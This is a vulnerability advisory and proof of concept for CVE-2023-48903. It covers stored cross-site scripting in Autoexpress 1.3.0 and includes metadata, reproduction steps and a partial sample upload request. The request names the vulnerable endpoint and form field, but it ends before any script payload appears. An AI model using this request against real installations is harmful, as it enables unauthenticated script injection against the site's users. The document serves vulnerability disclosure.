Authored by Scott White

Tramyardg Autoexpress version 1.3.0 suffers from a persistent cross site scripting vulnerability.

advisories | CVE-2023-48903

# Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 11/28/2023
# Exploit Author: Scott White
# Vendor Homepage:
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48903

# References:

# Description:
Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) feature that allows for an unauthenticated attacker to execute JavaScript commands.

# Proof of Concept:
+ Go to "http://localhost/autoexpress"
+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)
+ The form-data name "imageType[]" is vulnerable

# Sample Request
POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1
Host: localhost
Content-Length: 17016
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Content-Disposition: form-data; name="files[]"; filename="image.jpeg"
Content-Type: image/jpeg


Content-Disposition: form-data; name="id"


Content-Disposition: form-data; name="fd[]"



Content-Disposition: form-data; name="imgType[]"